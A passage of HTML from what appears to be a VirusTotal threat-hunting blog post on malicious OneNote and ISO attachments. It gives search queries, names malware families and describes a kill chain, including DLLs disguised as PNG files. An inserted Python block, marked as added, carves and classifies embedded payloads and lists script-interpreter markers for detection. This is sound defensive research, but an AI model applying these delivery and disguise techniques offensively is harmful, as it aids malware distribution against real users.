font-variant-numeric: normal; text-wrap: wrap; vertical-align: baseline;">ISO files are being disguised as legitimate installation packages for a variety of software, including Windows, Telegram, AnyDesk, and malicious CryptoNotepad, among others.</span></p></li></ul><div><span face="Google Sans, sans-serif" style="color: #1f1f1f;"><div class="separator" style="clear: both; text-align: center;"><a href="https://assets.virustotal.com/reports/2023-emerging" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" data-original-height="676" data-original-width="733" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ1ZBD5twWIEfkQ4ByRDJW4nFOOV_CxFeL0tGrOrQVYu7FDMHW3SXTBfKrRcigf5Fsx-vVMYUH285ZiDXjj69AJpXqoCJ_fYIVtZttwqiCk66t1IFZj7Ocfu5-F5nGqz1vNpeG5g6LM-aDORzWOn40mUxoR2DHst6Q-lgMRv4cnKZ_r6ZxD-TdkAiH7lw/s16000/Frame%2096%20(1).png" /></a></div><br /><span style="font-size: 14px; white-space-collapse: preserve;"><br /></span></span></div><div><span id="docs-internal-guid-876b1533-7fff-e942-e227-7b29aa2df4e1"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #4d4d4d; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">For full details, you can </span><a href="https://assets.virustotal.com/reports/2023-emerging" style="text-decoration-line: none;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">download the report here</span></a><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #4d4d4d; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. 
</span></p><br /><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #4d4d4d; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">As we usually do, in this blog post we will focus on technical hunting ideas you can use to monitor malicious activity. We also provide additional technical details for some of the most interesting points discussed in the report.</span></p><br /></span></div><div><span id="docs-internal-guid-946f9fdf-7fff-053a-56e1-92a70b3d2050"><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span face="Arial, sans-serif" style="color: #434343; font-size: 14pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space-collapse: preserve;">Monitoring malicious attachments</span></h3><br /><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 3pt 0pt 6pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Our data shows that there was an increase in the number of malicious files attached to emails between March and April of 2023. In terms of suspicious attachments, for the past two years, we have observed spikes in the number of suspicious PDF files linked to malicious campaigns. 
These files can be used for a variety of purposes, such as exploiting vulnerabilities (less usual) or phishing (most of the time).</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt; padding: -3pt 0pt 0pt 0pt;"><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">OneNote is becoming a popular format for malware distributed as email attachments in 2023. We will describe the OneNote attack flow in the next section. In 2023, it became the fastest-growing format for malicious attachments, by percentage.</span></p><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Jzy8H6cwMMa6WwrH8JCbF1msv25tGSn6hzGNjiMrsLpKaGImbATGy9BDIGqgP8VmJYIH31FvbX2Ik4ZXmrxZK3EiaHpPhmoI0e22EbYexbQEItiHD7drHyaa43QKWLaKdb1wSUuHOS2Hb8MuJ5AC3_x2YsAZQt5f3FkUJfx-WIAUbOPH1O3gGWm_rRc/s891/rep1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="555" data-original-width="891" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Jzy8H6cwMMa6WwrH8JCbF1msv25tGSn6hzGNjiMrsLpKaGImbATGy9BDIGqgP8VmJYIH31FvbX2Ik4ZXmrxZK3EiaHpPhmoI0e22EbYexbQEItiHD7drHyaa43QKWLaKdb1wSUuHOS2Hb8MuJ5AC3_x2YsAZQt5f3FkUJfx-WIAUbOPH1O3gGWm_rRc/s16000/rep1.png" /></a></div><br /><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></div><div><span face=""Google Sans", sans-serif" style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: 
normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></div><div><span face=""Google Sans", sans-serif" style="background-color: transparent; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><p dir="ltr" style="background-color: white; color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 3pt; padding: 0pt 0pt 6pt;"><span style="background-color: transparent; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">In 2023, we saw a significant increase in the use of JavaScript distributed alongside HTML in sophisticated phishing attacks designed to steal victims' credentials. Excel, RTF, CAB, compressed formats, and Word all seem to be declining in popularity as malicious attachments.</span></p><span style="color: #1f1f1f;"><span style="font-size: 10.5pt;"><br /></span></span><h3 dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span face="Arial, sans-serif" style="color: #434343; font-size: 14pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline;">OneNote to rule them all</span></h3><span style="color: #1f1f1f;"><span style="font-size: 10.5pt;"><br /></span></span><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Suspicious OneNote files uploaded to VirusTotal can be filtered using the following VTI query:</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; 
margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520type%253Aone%2520p%253A%25205%252B/files" style="text-decoration-line: none;"><span face="Arial, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">entity:file type:one p:5+</span></a></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Most of the files in our collection were submitted in 2023. We can observe how AntiVirus detection during January and the first half of February was significantly lower than afterwards, when security vendors improved their detection for this format. 
</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSBE-odDeV8FbE3e9-q3_sJqXiwS52P4IOq8iB88fFBXvnQnKtTjCf5ZxVLLqbzz2fv4pX9QPCg8UxI9keqnXotGHKKdTruMxVKkRhVh5A15UzEQJZoM7_voBVHddqwAlzyZfxMzQw2022LowwKr6uWoWXRwYdeaCRjz7kz9fSkXEmow6Wkz8mUQD0aR4/s720/rep2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="521" data-original-width="720" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSBE-odDeV8FbE3e9-q3_sJqXiwS52P4IOq8iB88fFBXvnQnKtTjCf5ZxVLLqbzz2fv4pX9QPCg8UxI9keqnXotGHKKdTruMxVKkRhVh5A15UzEQJZoM7_voBVHddqwAlzyZfxMzQw2022LowwKr6uWoWXRwYdeaCRjz7kz9fSkXEmow6Wkz8mUQD0aR4/s16000/rep2.png" /></a></div><br /><p></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Malicious OneNote files usually embed a malicious file (vba, html+jscript, powershell, or any combination of them) and, as happens with malicious Office attachments, try to convince the victim to allow execution. 
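
To triage what such a OneNote lure actually carries, the added example below (not code from this post or from VirusTotal) carves every FileDataStoreObject out of a .one file and classifies each embedded payload by its content; the same content sniffer also flags the DLL-served-as-.png trick discussed later in this section. It assumes the FileDataStoreObject layout and GUIDs from the public MS-ONESTORE specification, and every sample byte string is constructed inline.

```python
"""Carve embedded files out of a OneNote (.one) section and sniff what they really are.

Added example, not code from the VirusTotal post or from VirusTotal itself. The layout
follows the public MS-ONESTORE description of FileDataStoreObject: a 16-byte header
GUID, an 8-byte little-endian length, 4 unused plus 8 reserved bytes, the raw file data,
then a footer GUID. Assumption: the GUIDs below are transcribed correctly from that
specification; verify against a real sample before relying on them in production.
"""
import hashlib
import uuid

# {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}: magic GUID at offset 0 of a .one file.
ONE_FILE_MAGIC = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le
# Header and footer GUIDs that bracket every embedded file (FileDataStoreObject).
FDSO_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FDSO_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
FDSO_PREAMBLE = 16 + 8 + 4 + 8     # guidHeader + cbLength + unused + reserved
IMAGE_FILE_DLL = 0x2000            # COFF Characteristics flag
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SCRIPT_MARKERS = (b"powershell", b"wscript", b"cscript", b"mshta", b"@echo off")


def u32(buf: bytes, off: int) -> int:
    return int.from_bytes(buf[off:off + 4], "little")


def sniff(payload: bytes) -> str:
    """Classify a blob by content, never by the name or extension the lure shows."""
    if payload[:2] == b"MZ" and len(payload) >= 0x40:
        e_lfanew = u32(payload, 0x3C)
        if payload[e_lfanew:e_lfanew + 4] == b"PE\0\0" and len(payload) >= e_lfanew + 24:
            characteristics = int.from_bytes(payload[e_lfanew + 22:e_lfanew + 24], "little")
            return "pe-dll" if characteristics & IMAGE_FILE_DLL else "pe-exe"
        return "mz-stub"                     # MZ header without a PE signature
    if payload[:8] == PNG_MAGIC:
        return "png"
    if payload[:16] == ONE_FILE_MAGIC:
        return "onenote"                     # nested .one, one of the second stages listed
    head = payload[:512].lower()
    if any(marker in head for marker in SCRIPT_MARKERS):
        return "script"                      # BAT / VBS / PowerShell / HTA style dropper text
    return "unknown"


def is_onenote(data: bytes) -> bool:
    return data[:16] == ONE_FILE_MAGIC


def looks_disguised(served_name: str, payload: bytes) -> bool:
    """True for a PE served under an image-like name (the DLL-as-.png trick)."""
    image_ext = served_name.lower().endswith((".png", ".jpg", ".jpeg", ".gif", ".bmp"))
    return image_ext and sniff(payload).startswith("pe-")


def carve_embedded_files(data: bytes) -> list:
    """Return one record per FileDataStoreObject found anywhere in the .one data."""
    found = []
    pos = data.find(FDSO_HEADER)
    while pos != -1:
        size = int.from_bytes(data[pos + 16:pos + 24], "little")
        start, end = pos + FDSO_PREAMBLE, pos + FDSO_PREAMBLE + size
        if size > 0 and len(data) >= end:
            payload = data[start:end]
            found.append({
                "offset": start,
                "size": size,
                "sha256": hashlib.sha256(payload).hexdigest(),  # pivot value for VT lookups
                "kind": sniff(payload),
                # False when the object is truncated or the length field was tampered with
                "footer_ok": data[end:end + 16] == FDSO_FOOTER,
            })
            pos = data.find(FDSO_HEADER, end)
        else:
            pos = data.find(FDSO_HEADER, pos + 16)       # bogus length: skip, keep scanning
    return found


def _fake_dll() -> bytes:
    """Constructed stand-in: MZ stub, PE signature and a COFF header with IMAGE_FILE_DLL
    set. Not a runnable binary, just enough header for sniff() to classify it."""
    dos = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little")   # e_lfanew at 0x3C points to 0x40
    coff = (0x8664).to_bytes(2, "little") + (1).to_bytes(2, "little") + b"\0" * 12
    coff += (0xF0).to_bytes(2, "little") + (0x2022).to_bytes(2, "little")  # Characteristics
    return dos + b"PE\0\0" + coff


def _fake_onenote(*payloads: bytes) -> bytes:
    """Constructed .one-like blob: file magic, filler, one FileDataStoreObject per payload."""
    out = ONE_FILE_MAGIC + b"\0" * 64
    for p in payloads:
        out += FDSO_HEADER + len(p).to_bytes(8, "little") + b"\0" * 12 + p + FDSO_FOOTER + b"\0" * 8
    return out


# Constructed sample: a "DLL" plus a script lure, the combination the post describes.
SAMPLE_ONE = _fake_onenote(_fake_dll(), b"' constructed lure stub\r\nwscript.echo \"placeholder\"\r\n")

if __name__ == "__main__":
    for rec in carve_embedded_files(SAMPLE_ONE):
        print(rec)
    print("view.png disguised as image?", looks_disguised("view.png", _fake_dll()))
```

The sha256 of each carved payload is the value to pivot on in VirusTotal; a record whose footer_ok is False points at a truncated or tampered object that deserves a manual look.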
</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/collection/e-73ec2712249a10574ab9d37461dfec7480173fa106e411586f41cac444a8ce61" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Commonalities</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> for the files resulting from the previous search offer some interesting data on who is currently using this format for distribution:</span></p><ul style="color: #1f1f1f; font-size: 10.5pt; margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Many of them distribute QBot, RemcosRAT or </span><a href="https://www.virustotal.com/gui/file/9b872405b3a94a85364e4562b93b33238b82d1b5d0241c645f3f49bf045d1498" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; 
font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">AsyncRAT</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. We also found </span><a href="https://www.virustotal.com/gui/file/d8cca538ecd91252ed5294bd8bbbb5772245e8b1315fd9723e1f08ee4ef6958d/community" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Emotet</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> malware samples using OneNote for spreading.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Around 20% seem to distribute QakBot.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; 
font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The </span><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520crowdsourced_yara_rule%253A01267baf74%257CMicrosoft_OneNote_with_Suspicious_String/files" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Microsoft_OneNote_with_Suspicious_String</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Crowdsourced YARA rule seems to provide good detection with a low false positive ratio. </span></p></li></ul><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Payloads vary from family to family, but many of them access external URLs to download a DLL file camouflaged as a PNG file. 
This is a </span><a href="https://www.virustotal.com/gui/search/entity%253Aurl%2520path%253A%2522*.png%2522%2520tag%253Adownloads-pe/urls" style="text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">very old trick</span></a><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> used to bypass basic firewall rules or just look less suspicious to the eye. </span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">We can find several examples of this, for instance by searching for BumbleBee malware samples reaching a remote "view.png" file or Qakbot samples contacting "01.png" on any network resource.</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The most usual kill chain in which the OneNote format is involved is as follows:</span></p><ul style="color: #1f1f1f; font-size: 10.5pt; margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; 
font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The victim receives an email with a OneNote attachment. The mail body encourages the victim to click on a button to see a hidden/distorted image or document.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">This button executes a script (VBScript, HTA, PowerShell, etc.) that will launch a payload, either embedded into the same script or downloaded from an external resource. 
</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The external payload might be yet another OneNote file, an image file renamed as a ".bat" file, a DLL file that's loaded into memory or even a Windows executable.</span></p></li></ul><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">The following is an example of an obfuscated second stage </span><a href="https://www.virustotal.com/gui/file/a090db54343f919a8604eec2e601cba1ffd8bbf069a286dbf4b0b5b4e91954ea?nocache=1" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">.Net executable</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"> payload extracted from this </span><a 
href="https://www.virustotal.com/gui/file/bb79400c2adcaf1529e04490ce4a41a421ae467518f8ff942c279ff0a8c3f6c6/content" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">powershell script</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">:</span></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="color: black; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJqpPLr3XPPo5dvbUag8tQ6VDgFJvHJ1WxWuDLPjI0Dk7oJA8KxJrdVetFtLMUoMRJKIHFlAJeEbywKcIsZNXTAl20YqUEv9Xob05ZfWGUGsb9BpIku3em2PECxlzHizHeV82lPNy66NASc4HDlv3aQJdnMGOt9VJ_SWq8hwB4P2HS5ryiu_0n5a7PnWs/s936/rep3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="936" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJqpPLr3XPPo5dvbUag8tQ6VDgFJvHJ1WxWuDLPjI0Dk7oJA8KxJrdVetFtLMUoMRJKIHFlAJeEbywKcIsZNXTAl20YqUEv9Xob05ZfWGUGsb9BpIku3em2PECxlzHizHeV82lPNy66NASc4HDlv3aQJdnMGOt9VJ_SWq8hwB4P2HS5ryiu_0n5a7PnWs/s16000/rep3.png" /></a></div><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></span><p></p><h3 dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span face="Arial,sans-serif" style="background-color: transparent; 
color: #434343; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ISO files as a flexible alternative</span></h3><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Windows-targeting malware bundled in ISO files is a highly popular delivery method used by threat actors these days. It is used on a large scale for crimeware distribution as well as in </span><a href="https://blog.virustotal.com/2022/11/not-dream-job-hunting-for-malicious-job.html" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">high-profile APT campaigns</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. 
You can use the “isoimage” tag to list ISO files in VTI:</span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">You can be more specific to detect only those ISO files containing an executable: </span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520(tag%253Acontains-pe%2520OR%2520tag%253Acontains-elf%2520OR%2520tag%253Acontains-macho)/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: 
normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage (tag:contains-pe OR tag:contains-elf OR tag:contains-macho)</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Another interesting approach is to leverage Sandbox reports to find ISO files that interact (drop/delete/open/execute) with specific file types during their execution:</span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%3Afile%20tag%3Aisoimage%20behaviour_files%3A%22.exe%22%20not%20tag%3Acontains-pe/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: 